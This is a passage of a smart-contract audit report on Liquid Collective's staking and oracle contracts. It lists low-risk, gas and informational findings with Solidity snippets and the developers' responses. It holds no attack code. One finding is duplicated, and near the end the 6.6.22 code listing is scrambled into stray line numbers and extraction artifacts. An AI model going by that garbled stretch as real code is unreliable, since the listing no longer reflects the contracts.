Severity: Low Risk
Context: OracleManager.1.sol#L429-L435, River.1.sol#L545-L554
Description: The current protocol leaves it up to the oracle members to come to a quorum to set either of report.slashingContainmentMode or report.bufferRebalancingMode to true or false. That means the oracle members have the power to decide off-chain whether validators should be exited and whether some of the deposit balance should be reallocated for redeeming (versus an algorithmic decision by the protocol on-chain). A potential bad scenario would be oracle members deciding not to signal for new validators to exit, and in the time from the current epoch to the next report some validators get penalized or slashed, which would reduce the underlying value of the shares. If those validators had exited before getting slashed or penalized, the redeemers would have received more ETH back for their investment.
Recommendation: Document the off-chain decision making process for setting report.slashingContainmentMode and report.bufferRebalancingMode, or implement a trustless process on-chain.
Liquid Collective: This decision was made in parallel to releasing a public specification of the Oracle report crafting algorithm, allowing anyone to audit the reports based on the aggregated public data. The bufferRebalancingMode is still not 100% defined on our side, but the value will be set based on the lengths of the entry and exit queues, which we don't have on-chain. This is the intended behavior; we want the oracle to be precisely defined by a spec (wip on our side) so that anyone could audit and rebuild the reported data due to its ability to be replayed from public data.
Spearbit: Acknowledged.
+6.4.14 Anyone can call depositToConsensusLayer and potentially push wrong data on-chain
Severity: Low Risk
Context: ConsensusLayerDepositManager.1.sol#L81
Description: Anyone can call depositToConsensusLayer and potentially push wrong data on-chain. An example is when an operator would want to remove a validator key that is not funded yet but has an index below the operator limit and will be picked by the strategy if depositToConsensusLayer is called. Then anyone can front-run the removal call by the operator and force-push this validator's info to the deposit contract.
Recommendation: It would be best to restrict the calls to depositToConsensusLayer to a privileged entity.
Liquid Collective: This is the downside of putting this method back to public. The main goal here is to limit the required actions from an admin entity to operate the system. Now everything required to run it in its current operator registry state is the oracle report. This is the accepted behavior; the main goal is to concentrate critical decisions around the Oracle, making it the main bottleneck, upon which we will work to further decentralize its quorum participation / verification logic.
Spearbit: Acknowledged.
6.5 Gas Optimization
+6.5.1 Calculation of currentMaxCommittableAmount can be simplified
Severity: Gas Optimization
Context: River.1.sol#L603-L607
Description: currentMaxCommittableAmount is calculated as:
// we adapt the value for the reporting period by using the asset balance as upper bound
uint256 underlyingAssetBalance = _assetBalance();
uint256 currentBalanceToDeposit = BalanceToDeposit.get();
...
uint256 currentMaxCommittableAmount = LibUint256.min(
    LibUint256.min(underlyingAssetBalance, (currentMaxDailyCommittableAmount * period) / 1 days),
    currentBalanceToDeposit
);
But underlyingAssetBalance is Bu = Bv + Bd + Bc + Br + 32(Cd - Cr), which is greater than currentBalanceToDeposit Bd, since the other components are non-negative values. The parameters are:
• Bv: LastConsensusLayerReport.get().validatorsBalance
• Bd: BalanceToDeposit.get()
• Bc: CommittedBalance.get()
• Br: BalanceToRedeem.get()
• Cd: DepositedValidatorCount.get()
• Cr: LastConsensusLayerReport.get().validatorsCount
• M: currentMaxCommittableAmount
• m: (currentMaxDailyCommittableAmount * period) / 1 days
• Bu: underlyingAssetBalance
Note that Cd >= Cr is an invariant that is enforced by the protocol, and so currently we are computing M as: M = min(Bu, Bd, m) = min(Bd, m), since Bu >= Bd.
Recommendation: Based on the definitions and the invariant checks, the above minimum calculation can be simplified to:
uint256 currentMaxCommittableAmount = LibUint256.min((currentMaxDailyCommittableAmount * period) / 1 days, currentBalanceToDeposit);
Liquid Collective: Fixed in commit 8f0f29.
Spearbit: Verified.
+6.5.2 Remove redundant array length check and variable to save gas.
Severity: Gas Optimization
Context: ConsensusLayerDepositManager.1.sol#L103, ValidatorKeys.sol#L83-L84
Description: When someone calls ConsensusLayerDepositManager.depositToConsensusLayer, the contract will verify that the receivedSignatureCount matches the receivedPublicKeyCount returned from _getNextValidators. This is unnecessary, as the code always creates them with the same length.
Recommendation: Remove the check and associated variable to save some gas:
- uint256 receivedSignatureCount = signatures.length;
- if (receivedSignatureCount != receivedPublicKeyCount) {
-     revert InvalidSignatureCount();
- }
Liquid Collective: Fixed in PR 196.
Spearbit: Verified.
+6.5.3 Duplicated events emitted in River and RedeemManager
Severity: Gas Optimization
Context: RedeemManager.1.sol#L159, River.1.sol#L481
Description: The amount of ETH pulled from the redeem contract when setConsensusData is called by the oracle is notified with events in both the RedeemManager and River contracts.
Recommendation: Consider removing SentExceedingEth from RedeemManager to save gas and using only PulledRedeemManagerExceedingEth from River.
Liquid Collective: Fixed in commit ec310f.
Spearbit: Fixed.
+6.5.4 totalRequestedExitsValue's calculation can be simplified
Severity: Gas Optimization
Context: OperatorsRegistry.1.sol#L678-L692
Description: In the for loop in this context, totalRequestedExitsValue is updated for every operator that satisfies _getActiveValidatorCountForExitRequests(operators[idx]) == highestActiveCount. Based on the used increments, their sum equals optimalTotalDispatchCount.
Recommendation: One can increment totalRequestedExitsValue in one go outside of this for loop:
// for loop without `totalRequestedExitsValue` updates
totalRequestedExitsValue += optimalTotalDispatchCount; // <--- new line
_count -= optimalTotalDispatchCount;
Liquid Collective: Fixed in commit 50af4e.
Spearbit: Verified.
+6.5.5 Report's bufferRebalancingMode and slashingContainmentMode are only used during the reporting transaction process
Severity: Gas Optimization
Context: OracleManager.1.sol#L340-L341
Description: report.bufferRebalancingMode and report.slashingContainmentMode are only used during the transaction, and their previous values are not used in the protocol.
They can be removed from being added to the stored report. Note that their historical values can be queried by listening to the ProcessedConsensusLayerReport(report, vars.trace) events.
Recommendation: The implementation can be changed so that bufferRebalancingMode and slashingContainmentMode only occupy stack or storage space and do not get added to storage.
Liquid Collective: The main reason was to be able to query the entire latest report from view calls. We will keep these in storage, as currently the slashingContainmentMode flag is used in the oracle process (if active, the logic to deactivate is different, so we need the last report value). This is not the case for bufferRebalancingMode, but as the spec of the oracle might evolve it is better to keep both.
Spearbit: Acknowledged.
6.6 Informational
+6.6.1 Add more comments/documentation for ConsensusLayerReport and StoredConsensusLayerReport structs
Severity: Informational
Context: IOracleManager.1.sol#L102-L125
Description: The ConsensusLayerReport and StoredConsensusLayerReport structs are defined as:
/// @notice The format of the oracle report
struct ConsensusLayerReport {
    uint256 epoch;
    uint256 validatorsBalance;
    uint256 validatorsSkimmedBalance;
    uint256 validatorsExitedBalance;
    uint256 validatorsExitingBalance;
    uint32 validatorsCount;
    uint32[] stoppedValidatorCountPerOperator;
    bool bufferRebalancingMode;
    bool slashingContainmentMode;
}
/// @notice The format of the oracle report in storage
struct StoredConsensusLayerReport {
    uint256 epoch;
    uint256 validatorsBalance;
    uint256 validatorsSkimmedBalance;
    uint256 validatorsExitedBalance;
    uint256 validatorsExitingBalance;
    uint32 validatorsCount;
    bool bufferRebalancingMode;
    bool slashingContainmentMode;
}
Comments regarding their specified fields are lacking.
Recommendation: Add more documentation; specifically, it would be great to mention:
• The requirements for a valid epoch that is reported or stored
• The fact that validatorsSkimmedBalance, validatorsExitedBalance, and validatorsCount are non-decreasing values
• What the bufferRebalancingMode and slashingContainmentMode flags are and how they get decided to be picked by the oracle members
• Exactly how and at what specific moment these values are calculated
And then make sure the current and future implementations are following these specifications.
Liquid Collective: Fixed in commit 07c57e.
Spearbit: Verified.
+6.6.2 postUnderlyingBalanceIncludingExits and preUnderlyingBalanceIncludingExits can be removed from setConsensusLayerData
Severity: Informational
Context: OracleManager.1.sol#L349, OracleManager.1.sol#L360, OracleManager.1.sol#L380
Description: Both postUnderlyingBalanceIncludingExits (Bu^post) and preUnderlyingBalanceIncludingExits (Bu^pre) include the accumulated skimmed and exited amounts over time, part of which might have exited the protocol through redeeming (or been skimmed back to CL and penalized). Their delta is almost the same as the delta of vars.postReportUnderlyingBalance and vars.preReportUnderlyingBalance (almost, if one adds a check for non-decreases of validator counts).
• Bu^post: postUnderlyingBalanceIncludingExits
• Bu^pre: preUnderlyingBalanceIncludingExits
• ΔBu: Bu^post - Bu^pre
• Bu^report,post: vars.postReportUnderlyingBalance
• Bu^report,pre: vars.preReportUnderlyingBalance
• ΔBu^report: Bu^report,post - Bu^report,pre
• Bv^prev: previous reported/stored value for total validator balances in CL, LastConsensusLayerReport.get().validatorsBalance
• Bv^curr: current reported value of total validator balances in CL, report.validatorsBalance
• ΔBv: Bv^curr - Bv^prev (can be negative)
• Bs^prev: LastConsensusLayerReport.get().validatorsSkimmedBalance
• Bs^curr: report.validatorsSkimmedBalance
• ΔBs: Bs^curr - Bs^prev (always non-negative, this is an invariant that gets checked)
• Be^prev: LastConsensusLayerReport.get().validatorsExitedBalance
• Be^curr: report.validatorsExitedBalance
• ΔBe: Be^curr - Be^prev (always non-negative, this is an invariant that gets checked)
• C^prev: LastConsensusLayerReport.get().validatorsCount
• C^curr: report.validatorsCount
• ΔC: C^curr - C^prev (this value should be non-negative; note this invariant has not been checked in the codebase)
• C^deposit: DepositedValidatorCount.get()
• Bd: BalanceToDeposit.get()
• Bc: CommittedBalance.get()
• Br: BalanceToRedeem.get()
Note that the above values are assumed to be in their form before the current report gets stored in storage. Then we would have:
Bu^post = Bv^curr + Bs^curr + Be^curr = Bu^pre + ΔBv + ΔBs + ΔBe - 32ΔC
and so:
ΔBu = ΔBv + ΔBs + ΔBe - 32ΔC = ΔBu^report
Recommendation: Defining the two variables Bu^post and Bu^pre seems unnecessary; one could check the required boundary conditions and calculate the reward and vars.availableAmountToUpperBound using only ΔBu^report:
ΔBv + ΔBs + ΔBe - 32ΔC
That can also be simplified to reduce reading multiple times from storage. The only places that postUnderlyingBalanceIncludingExits and preUnderlyingBalanceIncludingExits are actually used are in revert parameters when boundary conditions are not met (1, 2).
Related issue: Report's validatorsCount's historical non-decreasingness does not get checked.
Liquid Collective: Addressed in commit 528a77d6.
Spearbit: Verified.
+6.6.3 The formula or the parameter names for calculating currentMaxDailyCommittableAmount can be made more clear
Severity: Informational
Context: River.1.sol#L597-L602
Description: currentMaxDailyCommittableAmount is calculated using the formula below:
// we compute the max daily committable amount by taking the asset balance without the balance to deposit into account
uint256 currentMaxDailyCommittableAmount = LibUint256.max(
    dcl.maxDailyNetCommittableAmount,
    (uint256(dcl.maxDailyRelativeCommittableAmount) * (underlyingAssetBalance - currentBalanceToDeposit)) / LibBasisPoints.BASIS_POINTS_MAX
);
Therefore its value is the maximum of two potential maximum values.
Recommendation: It might make sense to use the minimum of the two potential maximum values, to make sure the final result is always less than the two suggested upper bounds.
Liquid Collective: max was chosen here because the net amount is seen as a "bootstrapping" amount when the underlying balance is low; then it switches to the relative value once the underlying value increases.
Spearbit: It would be best to document this choice and also pick a different parameter name for dcl.maxDailyNetCommittableAmount, as the current name might be slightly confusing.
Comments have been added in PR 198. Also, commit bfd3b5 ensures that dcl.maxDailyRelativeCommittableAmount does not exceed BASIS_POINTS_MAX.
+6.6.4 preExitingBalance is a rough estimate for signalling the number of validators to request to exit
Severity: Informational
Context: River.1.sol#L556-L574
Description: exitingBalance and preExitingBalance might be trying to compensate for the same portion of balance (non-stopped validators which have been signaled to exit and are in the CL exit queue). That means the validatorCountToExit calculated to accommodate the redeem demand is actually lower than what is required. The important portion of preExitingBalance is for the validators that were signaled to exit in the previous reporting round but that the operators have not registered for exit in CL. Also, totalStoppedValidatorCount can include slashed validator counts, which again lowers the required validatorCountToExit, and those values should not be accounted for here. Perhaps the oracle members should also report the slashing counts of validators so that one can calculate these values more accurately.
Recommendation: It would be best to add more documentation around the key parameters used in these calculations to make sure it is known what exactly they represent.
Liquid Collective: As soon as we detect a validator starting its exit process, the count of stopped validators is increased for the operator (so it is accounted for in the totalStoppedValidatorCount). So this value accounts for exits that would be expected from the operators but haven't been detected yet and are not yet accounted for in the stopped count and exiting balance. For the differentiation between exited and slashed validators, this is something we can do, but I think it would be better to have a common and unique flow for validators that are stopped, no matter the reason. It will indeed create a delta with the demand (e.g. we expect 32 ETH and we receive ~30), but the system is able to re-compute the demand and ask for additional exits in such scenarios.
Spearbit: The fact that the stopped validator count starts when the validator starts its exit process should be documented. In commit 2b79e1 comments have been added in regards to the usage of exitingBalance.
+6.6.5 More documentation can be added regarding the currentMaxDailyCommittableAmount calculation
Severity: Informational
Context: River.1.sol#L597-L602
Description: currentMaxDailyCommittableAmount is calculated as:
// we compute the max daily committable amount by taking the asset balance without the balance to deposit into account
uint256 currentMaxDailyCommittableAmount = LibUint256.max(
    dcl.maxDailyNetCommittableAmount,
    (uint256(dcl.maxDailyRelativeCommittableAmount) * (underlyingAssetBalance - currentBalanceToDeposit)) / LibBasisPoints.BASIS_POINTS_MAX
);
We can add further to the comment: since before the _commitBalanceToDeposit hook is called we have skimmed the remaining to-redeem balance to BalanceToDeposit, underlyingAssetBalance - currentBalanceToDeposit represents the funds allocated for CL (funds that are already in CL, funds that are in transit to CL, or funds committed to be deposited to CL). It is important that the redeem balance is already skimmed for this upper bound calculation, so for future code changes we should pay attention to the order of hook callbacks, otherwise the upper bounds would be different.
+6.6.5 More documentation can be added regarding the currentMaxDailyCommittableAmount calculation
Severity: Informational
Context: River.1.sol#L597-L602
Description: currentMaxDailyCommittableAmount is calculated as

    // we compute the max daily committable amount by taking the asset balance without the balance to deposit into account
    uint256 currentMaxDailyCommittableAmount = LibUint256.max(
        dcl.maxDailyNetCommittableAmount,
        (uint256(dcl.maxDailyRelativeCommittableAmount) * (underlyingAssetBalance - currentBalanceToDeposit))
            / LibBasisPoints.BASIS_POINTS_MAX
    );

We can add further to the comment: since the remaining to-redeem balance has already been skimmed to BalanceToDeposit before the _commitBalanceToDeposit hook is called, underlyingAssetBalance - currentBalanceToDeposit represents the funds allocated for the CL (funds that are already in the CL, funds that are in transit to the CL, or funds committed to be deposited to the CL). It is important that the redeem balance is already skimmed for this upper-bound calculation, so for future code changes we should pay attention to the order of hook callbacks; otherwise the upper bounds would be different.
Recommendation: Document/comment on the above for better clarity around the calculation of currentMaxDailyCommittableAmount.
Liquid Collective: More comments have been added in
• commit 9b69bc
• commit 769bda
Spearbit: Verified.

+6.6.6 BalanceToRedeem is only non-zero during a report processing transaction
Severity: Informational
Context: River.1.sol#L440-L445, River.1.sol#L468-L470, River.1.sol#L511, River.1.sol#L551, River.1.sol#L580-L588
Description: BalanceToRedeem only ever holds a non-zero value during report processing, once a quorum has been reached for the oracle member votes (setConsensusLayerData). At the very end of this process its value gets reset back to 0.
Recommendation: It would be best to document the above fact and, if it is not required to keep this value in storage, to utilise the stack or memory space instead.
Liquid Collective: This is something we discussed and we decided to keep it in storage for now for a possible future update of the reporting flow where exit funds might be kept between reports (and not automatically balanced back to deposits). But yes, in this implementation, balanceToRedeem == 0 outside of state transitions.
Spearbit: Verified.
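A minimal sketch of the storage-versus-stack trade-off behind this recommendation (our illustration, not the actual contracts):

    pragma solidity ^0.8.0;

    // Sketch: a value that is only non-zero within a single transaction can live
    // on the stack instead of storage, saving the set/reset storage writes.
    contract TransientValueSketch {
        uint256 private balanceToRedeemStored;

        function reportWithStorage(uint256 demand) external {
            balanceToRedeemStored = demand;   // SSTORE
            _consume(balanceToRedeemStored);  // SLOAD
            balanceToRedeemStored = 0;        // SSTORE back to zero
        }

        function reportWithStack(uint256 demand) external pure {
            uint256 balanceToRedeem = demand; // stays on the stack
            _consume(balanceToRedeem);
        }

        function _consume(uint256 amount) internal pure {
            // placeholder for the logic that spends the redeem balance
        }
    }

Keeping the value in storage, as Liquid Collective chose, is the more flexible option if future reporting flows need it to persist between reports.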
+6.6.7 Improve clarity on bufferRebalancingMode variable
Severity: Informational
Context: OracleManager.1.sol#L441, River.1.sol#L545, River.1.sol#L580-L588
Description: According to the documentation, the bufferRebalancingMode flag passed by the oracle should allow or disallow the rebalancing of funds between the Deposit and Redeem buffers. The flag correctly disables rebalancing in the DepositBuffer-to-RedeemBuffer direction, as can be seen here:

    if (depositToRedeemRebalancingAllowed && availableBalanceToDeposit > 0) {
        uint256 rebalancingAmount = LibUint256.min(
            availableBalanceToDeposit,
            redeemManagerDemandInEth - exitingBalance - availableBalanceToRedeem
        );
        if (rebalancingAmount > 0) {
            availableBalanceToRedeem += rebalancingAmount;
            _setBalanceToRedeem(availableBalanceToRedeem);
            _setBalanceToDeposit(availableBalanceToDeposit - rebalancingAmount);
        }
    }

but it is not used at all when pulling funds in the other direction:

    // if funds are left in the balance to redeem, we move them to the deposit balance
    _skimExcessBalanceToRedeem();

Recommendation: Consider renaming the variable and updating the documentation so it is clear that the flag is only supposed to control rebalancing to the redeem buffer.
Liquid Collective: This variable has been renamed to rebalanceDepositToRedeemMode in PR 196.
Spearbit: Verified.

+6.6.8 Fix code style consistency issues
Severity: Informational
Context: Most of the diff breaches the code style
Description: There is a small code-styling mismatch between the new code under audit and the style used throughout the rest of the code. Specifically, function parameter names are supposed to be prepended with _ to differentiate them from variables defined in the function body.
Recommendation: Prepend function parameter names with _ to match the rest of the codebase.
Liquid Collective: Fixed in PR 198.
Spearbit: Fixed.

+6.6.9 Remove unused constants
Severity: Informational
Context: Oracle.1.sol#L26
Description: DENOMINATION_OFFSET is unused and can be removed from the codebase.
Recommendation: If the constants in this context are not going to be used, it would be best to remove them from the codebase to keep the project cleaner.
Liquid Collective: Fixed in commit 7f15e6. OracleV1.ONE_YEAR has also been removed.
Spearbit: Verified.

+6.6.10 Document what TotalRequestedExits can potentially represent
Severity: Informational
Context: OperatorsRegistry.1.sol#L708-L711, TotalRequestedExits.sol#L8
Description: Documentation is lacking for TotalRequestedExits. This parameter represents a quantity that is a mix of exited (or to-be-exited) and slashed validators for an operator. Also, in general, this is a rough quantity, since we don't have finer reporting of slashed and exited validators (they are reported as a sum).
Recommendation: It would be great to add more documentation for this value and perhaps change its name (the parameter name is a bit misleading).
Liquid Collective: TotalRequestedExits has been removed from the codebase in PR 195, so this issue does not apply anymore.
Spearbit: Verified.

+6.6.11 Operators need to listen to RequestedValidatorExits and exit their validators accordingly
Severity: Informational
Context: OperatorsRegistry.1.sol#L700
Description: Operators need to listen to RequestedValidatorExits and exit their validators accordingly:

    emit RequestedValidatorExits(operators[idx].index, requestedExits + operators[idx].picked);

Note that requestedExits + operators[idx].picked represents the upper bound for the index of the funded validators that need to be exited by the operator.
Recommendation: Make sure the daemon clients are set up properly to execute the required actions upon receiving these events.
Liquid Collective: Acknowledged.
Spearbit: Acknowledged.

+6.6.12 Oracle members would need to listen to ClearedReporting and report their data if necessary
Severity: Informational
Context: Oracle.1.sol#L302
Description: Oracle members would need to listen to the ClearedReporting event and report their data if necessary.
Recommendation: The off-chain daemon needs to be configured to listen to this event and perform the required actions.
Liquid Collective: Acknowledged.
Spearbit: Acknowledged.

+6.6.13 The only way for an oracle member to change its report data for an epoch is to reset the reporting process by changing its address
Severity: Informational
Context: Oracle.1.sol#L238-L241, Oracle.1.sol#L189-L201
Description: If an oracle member has made a mistake in its CL report to the Oracle, or for some other reason would like to change its report, it would not be able to, due to the following if block:

    // we retrieve the voting status of the caller, and revert if already voted
    if (ReportsPositions.get(uint256(memberIndex))) {
        revert AlreadyReported(report.epoch, msg.sender);
    }

The only way for the said oracle member to be able to report different data is to reset its address by calling setMember. This would cause all the report variants and report positions to be cleared and force all the other oracle members to report their data again.
Related:
• Any oracle member can censor almost-quorum report variants by resetting its address.
Recommendation: Document the scenario in this issue and, if desired, make it possible for an oracle member to change its report before a quorum is reached (this could also be a time-based editing window).
Liquid Collective: Yes, this is a side effect of the oracle voting system, where in case of no quorum a new frame would be the only way to make things move forward in the votes. This is not the case anymore after remediations (commit aadbfb); now there is no way to change the vote and one has to wait for the next frame to be able to vote again.
Spearbit: Acknowledged.
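If an editing window were desired, a minimal sketch of what pre-quorum vote changing could look like (purely hypothetical; the bookkeeping below is a stand-in for ReportsPositions and the report variants, not the audited code):

    pragma solidity ^0.8.0;

    // Hypothetical sketch: let a member replace its report before quorum.
    contract RevoteSketch {
        error AlreadyReported(uint256 epoch, address member);

        mapping(uint256 => bool) private hasVoted; // stand-in for ReportsPositions
        bool private quorumReached;                // stand-in for the quorum state

        function _beforeStoringVote(uint256 memberIndex, uint256 epoch) internal {
            if (hasVoted[memberIndex]) {
                // once quorum is reached the vote is final; before that,
                // retract the previous vote and accept the new one
                if (quorumReached) revert AlreadyReported(epoch, msg.sender);
                _retractPreviousVote(memberIndex);
            }
            hasVoted[memberIndex] = true;
        }

        function _retractPreviousVote(uint256 memberIndex) internal {
            // would decrement the vote count of the member's previous report variant
        }
    }

Note that the remediation in commit aadbfb went the other way: votes are final and a member must wait for the next frame.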
+6.6.14 For a quorum-making CL report the epoch restrictions are checked twice
Severity: Informational
Context: Oracle.1.sol#L228-L231, OracleManager.1.sol#L268-L271
Description: When an oracle member reports to the Oracle's reportConsensusLayerData, the requirements for a valid epoch are checked once in reportConsensusLayerData:

    // checks that the report epoch is not invalid
    if (!river.isValidEpoch(report.epoch)) {
        revert InvalidEpoch(report.epoch);
    }

and once again in setConsensusLayerData:

    // we start by verifying that the reported epoch is valid based on the consensus layer spec
    if (!_isValidEpoch(cls, report.epoch)) {
        revert InvalidEpoch(report.epoch);
    }

Note that only the Oracle can call the setConsensusLayerData endpoint, and the only time the Oracle makes this call is when the quorum is reached in reportConsensusLayerData.
Recommendation: The second check inside setConsensusLayerData can be removed, but a comment should be added noting that the check has been performed in reportConsensusLayerData, to make sure future changes would not cause this check to be skipped.
Liquid Collective: We would prefer keeping it in both:
• On the Oracle side, this prevents members from erasing reports by reporting invalid epochs that are greater than the current frame's first epoch.
• On River, in the same spirit as what we decided to do by bringing all sanity checks inside the core contract, I would prefer being able to ensure a report is valid without assuming the behavior of the oracle contract, as this contract might change in the future.
Spearbit: Acknowledged.

+6.6.15 Clear report variants and report position data during the migration to the new contracts
Severity: Informational
Context: Oracle.1.sol#L36
Description: Upon migration to the new contract with a new type of reporting data, the old report positions and variants should be cleared by calling _clearReports() on the new contract or an older counterpart on the old contract. Note that the report variants slot will be changed from:

    bytes32(uint256(keccak256("river.state.reportsVariants")) - 1)

to:

    bytes32(uint256(keccak256("river.state.reportVariants")) - 1)

Recommendation: Make sure the reporting data is cleaned before the next round of the reporting process after the migration.
Liquid Collective: Fixed in PR 193 by clearing the report data upon reinitialization; the report variants slot has also been restored to its original slot.
Spearbit: Verified. We need to make sure oracle.initOracleV1_1() is called in the migration sequence to trigger the report cleanup.
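The slot change follows directly from how these unstructured-storage slots are derived from their name strings; a minimal sketch (our illustration):

    pragma solidity ^0.8.0;

    // Renaming the slot string moves the data: the two constants below hash to
    // different slots, so anything written under the old name is invisible
    // under the new one after an upgrade.
    contract SlotSketch {
        bytes32 internal constant OLD_SLOT =
            bytes32(uint256(keccak256("river.state.reportsVariants")) - 1);
        bytes32 internal constant NEW_SLOT =
            bytes32(uint256(keccak256("river.state.reportVariants")) - 1);

        function slotsDiffer() external pure returns (bool) {
            return OLD_SLOT != NEW_SLOT; // true
        }
    }

This is why restoring the original slot (as was eventually done) or explicitly clearing the old data are the two safe options.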
+6.6.16 Remove unused functions from Oracle
Severity: Informational
Context:
• Oracle.1.sol#L115
• Oracle.1.sol#L120
• Oracle.1.sol#L125
• Oracle.1.sol#L130
• Oracle.1.sol#L140
• Oracle.1.sol#L145
• Oracle.1.sol#L150
• Oracle.1.sol#L155
• Oracle.1.sol#L160
Description: The following functions are unused and can be removed from the Oracle's implementation:
• isValidEpoch
• getTime
• getExpectedEpochId
• getLastCompletedEpochId
• getCurrentEpochId
• getCLSpec
• getCurrentFrame
• getFrameFirstEpochId
• getReportBounds
Recommendation: It might be best to remove these endpoints to keep the codebase clean. These endpoints are just wrappers around the corresponding endpoints of the River contract.
Liquid Collective: This was for off-chain use and was a request to keep the oracle contract similar to its old version from the view-call point of view. The functions have been removed in commit f73551.
Spearbit: Verified.

+6.6.17 RedeemManager._claimRedeemRequests - Consider adding the recipient to the revert message in case of failure
Severity: Informational
Context: RedeemManager.1.sol#L454
Description: The purpose of the _claimRedeemRequests function is to facilitate the claiming of ETH on behalf of another party who has a valid redeem request. It is worth noting that if any of the calls to recipients fail, the entire transaction will revert. Although it is impossible to conduct a denial-of-service (DoS) attack in this scenario, as in the worst case the transaction sender can simply specify a different array of redeemRequestIds, it may still be challenging to determine the specific redemption request that caused the transaction to fail.
Recommendation: Consider adding the recipient to the revert message.
Liquid Collective: Fixed in commit 28602e.
Spearbit: Verified.
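A minimal sketch of the recommendation (our illustration; the error shape and the claim helper are assumptions, not the RedeemManager code):

    pragma solidity ^0.8.0;

    // Including the failing recipient (and the request id) in the revert data
    // makes it easy to tell which entry of redeemRequestIds broke a batched claim.
    contract ClaimRevertSketch {
        error ClaimRecipientFailed(uint32 redeemRequestId, address recipient);

        function _sendClaim(uint32 redeemRequestId, address recipient, uint256 amount) internal {
            (bool ok,) = recipient.call{value: amount}("");
            if (!ok) revert ClaimRecipientFailed(redeemRequestId, recipient);
        }
    }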
+6.6.18 River.1.sol should not have a permission to call requestRedeem(uint256 lsETHAmount)
Severity: Informational
Context: RedeemManager.1.sol#L114
Description: The function RedeemManagerAddress.requestRedeem(uint256 lsETHAmount) is not currently being called by the River.1.sol contract. In accordance with the principle of least privilege, any permissions or privileges that are not strictly necessary should be removed. Therefore, it is recommended to remove the permission for the River.1.sol contract to call this function. This will help to minimize the attack surface and reduce the risk of unauthorized access or misuse of the function.
Liquid Collective: Fixed in commit e76fd5 by removing the unnecessary permission from RedeemManagerAddress.requestRedeem(uint256 lsETHAmount).
Spearbit: Verified.

+6.6.19 Exit validator picking strategy does not consider slashed validators between the reported epoch and the current epoch
Severity: Informational
Context: Operators.2.sol#L281, OperatorsRegistry.1.sol#L615
Description: The current picking strategy in the OperatorsRegistry._pickNextValidatorsToExitFromActiveOperators function relies on a report from an old epoch. In between the reported epoch and the current epoch, validators might have been slashed, and so the strategy might pick and signal to the operators validators that have already been slashed. As a result, the suggested number of validators to exit the protocol to compensate for the redemption demand in the next round of reports might not be exactly what was requested. Similarly, the OperatorsV2._hasExitableKeys function only evaluates based on a report from an old epoch. In between the reported epoch and the current epoch, validators might have been slashed; thus, some returned operators might not have exitable keys in the current epoch.
Recommendation: It might not be possible to obtain real-time information on the slashed validators while picking the validators to exit, due to various technical limitations (e.g. delays between components). Consider documenting this limitation.
Liquid Collective: We have taken the decision to not separate slashed from stopped validators. This has an impact on the amount received due to exits, but it's accepted and the system can handle the problem by requesting another exit if the amount does not match the exit demand. Also, the OperatorsRegistry is able to "catch up" in case of stopped > exitRequests.
Spearbit: Acknowledged.

+6.6.20 Duplicated functions
Severity: Informational
Context: Operators.2.sol#L142, OperatorsRegistry.1.sol#L484
Description: The Operators.2._getStoppedValidatorCountAtIndex and OperatorsRegistry.1._getStoppedValidatorsCountFromRawArray functions are the same:

    File: Operators.2.sol
    142: function _getStoppedValidatorCountAtIndex(uint32[] storage stoppedValidatorCounts, uint256 index)
    143:     internal
    144:     view
    145:     returns (uint32)
    146: {
    147:     if (index + 1 >= stoppedValidatorCounts.length) {
    148:         return 0;
    149:     }
    150:     return stoppedValidatorCounts[index + 1];
    151: }

    File: OperatorsRegistry.1.sol
    484: function _getStoppedValidatorsCountFromRawArray(uint32[] storage stoppedValidatorCounts, uint256 operatorIndex)
    485:     internal
    486:     view
    487:     returns (uint32)
    488: {
    489:     if (operatorIndex + 1 >= stoppedValidatorCounts.length) {
    490:         return 0;
    491:     }
    492:     return stoppedValidatorCounts[operatorIndex + 1];
    493: }

Recommendation: Consider removing one of the functions.
Liquid Collective: Fixed in PR 195.
Spearbit: Verified.

+6.6.21 Funds might be pulled from CoverageFundV1 even when there has been no slashing incident
Severity: Informational
Context: CoverageFund.1.sol#L18-L19, OracleManager.1.sol#L416-L422
Description: vars.availableAmountToUpperBound might be positive even though no validators have been slashed. In this case, funds are still pulled from the coverage funds contract to get closer to the upper-bound limit:

    // if we have available amount to upper bound after pulling the exceeding eth buffer, we attempt to pull coverage funds
    if (vars.availableAmountToUpperBound > 0) {
        // we pull the funds from the coverage recipient
        vars.trace.pulledCoverageFunds = _pullCoverageFunds(vars.availableAmountToUpperBound);
        // we do not update the rewards as coverage is not considered rewards
        // we do not update the available amount as there are no more pulling actions to perform afterwards
    }

So it is possible for the coverage funds to get used even when there has been no slashing to account for.
Recommendation: Either update the NatSpec comment for CoverageFundV1 to document the above case, or introduce a finer implementation that accounts for the slashed validators directly.
Liquid Collective: Pulling funds from CoverageFunds is an independent procedure from the Oracle report. Following a slash, an off-chain resolution for reimbursement will occur, and reimbursement can happen a long time after the slash happens. The CoverageFund should be seen as an independent component allowing the injection of ETH into the system without minting LsETH.
File: IOracle.1.sol 204: 209: /// @dev Only callable by the adminitrator @audit typo and outdated function setMember(address _oracleMember, address _newAddress) external; modifier onlyAdminOrMember(address _oracleMember) { if (msg.sender != _getAdmin() && msg.sender != _oracleMember) { revert LibErrors.Unauthorized(msg.sender); File: Oracle.1.sol 28: 29: 30: 31: 32: 33: ... 189: ,! } _; } function setMember(address _oracleMember, address _newAddress) external onlyAdminOrMember(_oracleMember) { Recommendation: Update the above inline documentation. Liquid Collective: Fixed in PR 198. Spearbit: Verified. 32 +6.6.23 Document/mark unused (would-be-stale) storage parameters after migration Severity: Informational Context: • CLValidatorCount.sol#L10 • CLValidatorTotalBalance.sol#L10-L11 • LastOracleRoundId.sol#L10-L11 • Operators.1.sol#L10 • ReportVariants.sol#L8-L9 Description: The following storage parameters will be unused after the migration of the protocol to v1 • CLValidatorCount • CLValidatorTotalBalance • LastOracleRoundId.sol • OperatorsV1, this will be more than one slot (it occupies regions of storage) • ReportVariants, the slot has been changed (that means right after migration ReportVariants will be an empty array by default): bytes32(uint256(keccak256("river.state.reportsVariants")) - 1); - bytes32 internal constant REPORTS_VARIANTS_SLOT = ,! + bytes32 internal constant REPORT_VARIANTS_SLOT ,! = bytes32(uint256(keccak256("river.state.reportVariants")) - 1); Recommendation: Document/mark unused (would-be-stale) storage parameters after migration. Liquid Collective: The reports variant slot has been restored to its original slot, so this issue does not apply to it anymore • commit bcbb09. The other slots have been marked in • commit c32fc9. Spearbit: Verified. +6.6.24 pullEth, pullELFees and pullExceedingEth do not check for a non-zero amount before sending funds to River Severity: Informational Context: • ELFeeRecipient.1.sol#L31-L32 